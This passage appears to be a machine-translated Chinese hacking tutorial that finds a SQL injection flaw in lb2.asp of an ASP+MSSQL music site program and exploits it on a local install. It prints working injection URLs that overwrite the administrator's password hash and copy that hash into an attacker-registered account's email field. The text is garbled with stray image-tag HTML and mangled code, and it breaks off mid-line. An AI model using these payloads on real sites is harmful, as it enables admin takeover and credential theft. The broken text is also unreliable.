Author: gxm [B .S. T]
Original Source:Http://www.bugging.com.cn/
Hello everyone, I am GXM and haven't looked at the code for a long time. So I went to mycodes.net to look for the asp + mssql program, so as not to forget my knowledge, isn't it?
Install iis + mssql on the local machine, import the database. bat file to MSSQL, and manually complete the information in the connection file of the program. Check whether the website is successfully established. 1
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2151015014-0.jpg); "height = 441 src =" http://www.bkjia.com/uploads/allimg/131121/2151015014-0.jpg "width = 700 onload =" if (this. width> 700) this. width = 700; if (this. height> 700) this. height = 700; "border = 0>When I was watching the sky music program, I found that the developers of this program were still confused about the injection vulnerability, so they also used the injection script. Unfortunately, this script still has a vulnerability, after checking the code one by one, I found that session authentication is required for ASP with these vulnerabilities. Therefore, when I see the Model folder of the program, these ASP files are not filtered and injected, and the vulnerability-proof injection script is not used. Haha, it seems that this time the sky music program will fall down here. Let's take a look at this file lb2.asp. The vulnerability code is as follows:
! -- # Include file = "../user/conn. asp" -->
<%
If request ("id") = "" then
Response. write "<SCRIPT language = JavaScript> alert (haha! An error occurred! You must select at least one song to be connected !); "Response. write "javascript: window. close (); </SCRIPT> "the above Code indicates that the ID value cannot be empty. elseend ifid = replace (request (" id "),"","") 'filter Spaces "Dim MusicID, MusicArray, MusicNum MusicID = request. queryString ("id") returns the value of id to the variable MusicIDMusicArray = Split (MusicID, ",") to Split the value of ID. The separator is ","
MusicNum = UBound (MusicArray)-1
%> ............ <% For I = 0 To MusicNum MusicArray (I) = replace (MusicArray (I), "", "") set rs = server. createobject ("adodb. recordset ") SQL =" select * from MusicList where id = "& musicarray (I) Bring the split value into the SQL query statement rs. when open SQL, conn,> is reached, the vulnerability is generated. We find that the id only filters spaces and does not prevent injection scripts. spaces are good. Now let's take a look at what the Administrator's table is, open the local enterprise manager, open the database we imported in turn, view the Administrator's table name, 2
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2151011109-1.jpg); "height = 356 src =" http://www.bkjia.com/uploads/allimg/131121/2151011109-1.jpg "width = 700 onload =" if (this. width> 700) this. width = 700; if (this. height> 700) this. height = 700; "border = 0>His table is admin, and the column name is also very long. Now let me directly construct an SQL statement to modify the password of the Administrator table, http: // 127.0.0.1/Model/lb2.asp? ID = 125; update/**/admin/**/set/**/password = a94f3817962f44e0/**/where/**/username = admin --, 2
/**/Aims to trim spaces. a94f3817962f44e0 is the MD5 value of gxm. Open this page directly in IE and the admin password will be changed. 3
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2151014L7-2.jpg); "height = 459 src =" http://www.bkjia.com/uploads/allimg/131121/2151014L7-2.jpg "width = 700 onload =" if (this. width> 700) this. width = 700; if (this. height> 700) this. height = 700; "border = 0>
You may ask why the page cannot be displayed. Here is the answer for the dish, because the database is new. I just gave a value that does not exist to construct it, however, an error is returned after the database query, but the statement is successfully executed. Let's wait for the result to go To the backend. http: // 127.0.0.1/admin/admin_index.Asp, enter the account admin and password gxm. The account is successfully added to the background.
Okay, but it is not safe to enter the background, because the administrator can easily find that the password has been changed. Let's play tricks, apply for an account on the main site, and then look at the table of basic users, if the table name is "user", we will send the Administrator's MD5 value to the e-mail information of the newly registered account, open IE, apply for a 419891509 user, and enter the following address, http: // 127.0.0.1/Model/lb2.asp? ID = 125; update/**/[User]/**/set/**/Email = (select/**/password/**/from/**/admin /**/ where [username] = admin) /**/where/**/username = 419891509 --, 2
I will not explain this SQL statement. If you do not understand it, you can understand it. Now we can use 419891509 to check the email information. 5
= 700) window. open (http://www.bkjia.com/uploads/allimg/131121/2151015912-3.jpg); "height = 253 src =" http://www.bkjia.com/uploads/allimg/131121/2151015912-3.jpg "width = 555 onload =" if (this. width> 700) this. width =
